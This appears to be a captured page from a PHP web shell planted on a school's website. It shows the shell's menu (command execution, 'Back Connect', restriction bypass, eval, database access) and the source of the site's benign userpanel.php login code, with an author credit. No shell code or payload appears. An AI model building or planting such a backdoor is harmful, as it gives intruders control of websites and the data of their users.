File Manger -- Command Execute -- Back Connect -- BypasS Command eXecute(SF-DF) -- BypasS Directory -- Eval -- Data Base -- Server Information
File Name : /home/no2airforceschoo/domains/no2airforceschoolgwl.com/public_html/userpanel.php <?php /** * User has already logged in, so display relavent links, including * a link to the admin center if the user is an administrator. */ if (isset($_SESSION['userid'])) { echo "Welcome <b>".getPersonName($conn, $_SESSION['userid'])."</b>, "; if(@getUserLevel($conn, $_SESSION['userid'])=='9'){ echo "<a href=\"admin/myadmin.php\">Admin Center</a> | "; } echo "<a href=\"admin/logout.php?logout\">Logout</a>"; } else{ echo "Welcome <b>Guest!</b>, " ."<a href=\"admin/index.php\">Login</a> " ?> <?php } ?>
Coded by Amin Shokohi (Pejvak)